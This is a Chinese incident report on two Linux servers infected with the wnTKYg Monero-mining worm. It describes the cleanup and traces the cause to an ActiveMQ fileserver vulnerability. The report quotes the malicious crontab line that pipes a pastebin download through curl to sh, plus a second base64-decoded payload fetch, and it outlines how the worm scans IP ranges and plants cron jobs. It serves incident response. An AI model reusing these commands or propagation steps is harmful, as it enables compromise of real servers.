20180827 linux服务器矿机事件

一、解决方法
（1）查看阿里云服务器监控，发现两台linux的CPU占用率飙升100%且一直保持，查看ZYBD服务日志，依然有打卡数据显示。使用ssh登录两台linux，用top命令查看占用CPU最高的进程，但无奈发现只有两行代码如下图2-1所示

图2-1

显然top命令已被入侵木马进行删除或者修改，来隐藏CPU占用率最高的进程。从阿里云上态势感知企业使用版（非企业版不能查看详细信息）能够查到恶意进程的路径为/tmp/kworkerds。ps -ef |grep kworkerds 找到恶意进程对应进程号 kill掉。
（2）当kworkerds被kill掉之后，系统CPU并未下降，在此查看进程，kworkerds再次运行。判定是由定时任务或是保护程序使挖矿进程再次进行。crontab -l 发现被添加一条“* */10 * * */usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##”定时任务计划为每十分钟执行一次curl获取上述链接地址的内容，而上述链接地址的内容为“/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash”该内容解读为调用curl执行从 https://pastebin.com/raw/uuYVPLXd获取的内容调用系统内自带base64 -d 的base64解码操作 去解码上述地址中的网页内容。通过再次链接上述地址后得到的内容进行base64解码不难发现是一个shell脚本。该脚本为最主要的入侵脚本。
（3）通过分析该脚本发现，执行了很多xargs kill 的操作，当某些进程运行后自动kill掉，所以并不容易发现有问题的进程。通过脚本核心发现主要在lsof 命令，测试tcp特定的端口号被谁使用，如下图2-2所示

图2-2
脚本中 yum -y installl lsof之后才能使用上述命令。于是将lsof命令卸载后，CPU下降，稳定到0.1%左右。Lsof查看当端口没有被占用时，用该端口作为挖矿程序的sever端口进行服务。
（4）最后通过分析三个脚本，依次为挖矿主脚本，系统设置脚本，扫描端口的python中控木马脚本（都从挖矿主脚本curl链接中base64解码而来），依次清理掉/etc/cron.d/root中的定时任务，var/spool/cron 下的定时任务，/etc/init.d和/etc/rc.d/init.d中的开机启动项，最后将所有脚本创建的文件夹及相关定时任务清除，最后系统回归稳定。
（5）清理掉/tmp文件夹下的名为Aegis<…>的异常文件，和/usr/local/aegis/Aegis<…>的名为异常文件。
（6）删除掉/bin/httpdns 可执行文件。

二、原因及分析
（1）由本次执行的定时下载挖矿程序的脚本来看，是使用root权限，不难排除入侵者已得到root权限，即linux服务器密码可能泄露。
（2）经过网上查阅资料所知，本次wnTKYg挖矿木马大多通过redis的未授权登录，以及root权限安装等漏洞，获取root权限，通过远程向本地服务器写入定时文件，并执行木马程序。但由本次排查得知ZYBD系统现阶段并未使用redis，两台linux都没有redis进程运行，因此排除redis漏洞。但还是需注意redis使用事项，杜绝发生redis漏洞入侵。图3-1为redis预防处理方法

图3-1
（3）由挖矿脚本其中有一个中控木马的代码，使用语言为python,主要作用是一个端口扫描器，通过使本机向ident.me发送http请求获得本机的公网地址，具体代码如下图3-2所示

图3-2
本段代码获取到本机外网地址，然后构造本机外网地址类似的其余外网地址，经过测试得到该代码一共扫描从39.0.0.0 到 39.49.254.254所有的ip地址，并扫描这些端口的8161端口，如果找到8161端口状态LESTION，则建立tcp连接。
利用activemq5.0到activemq5.14之间的版本漏洞，即利用active mq的file server 功能进行从远程主机向本地主机file server 文件夹下的文件，并利用move方式的http请求将fileserver 文件夹下刚写入的文件移动到/etc/cron.d/root，因此执行定时脚本下载的木马任务被添加到本机的定时任务计划中，木马被下载后，本机变为矿机。
下图3-3为中控木马中使用8161端口从远程写入定时任务的代码。

图3-3
具体activemq漏洞及实现方式查看https://paper.seebug.org/346/

下图3-4为该文中提供的漏洞解决方案。

图3-4

解决方案：关闭activemq的file server功能。

三、总结
本次造成两台linux 服务器受到门罗币挖矿程序wnTKYg 入侵，主要原因是之前两台都存过active mq 5.9版本使用，经排查，本次木马利用activemq远程代码执行漏洞（5.0-5.14之间的版本都存在此漏洞）。木马通过扫描8161端口执行activemq的file server功能将远程主机代码写入，并加入本机定时任务，使本机定时执行挖矿程序及对应保护进程的下载和运行。该木马的传播方式为，在入侵之后，执行扫描与本机第一个字节网络地址相同的所有广域网ip的8161端口，找到开放该端口并可以执行activemq file server的ip进行木马植入，使其成为肉鸡来进行挖矿操作，因此本次木马植入者为上一个被感染的主机，本机也会成为传播木马的宿主。解决方案为将两台activemq的fileserver功能禁用。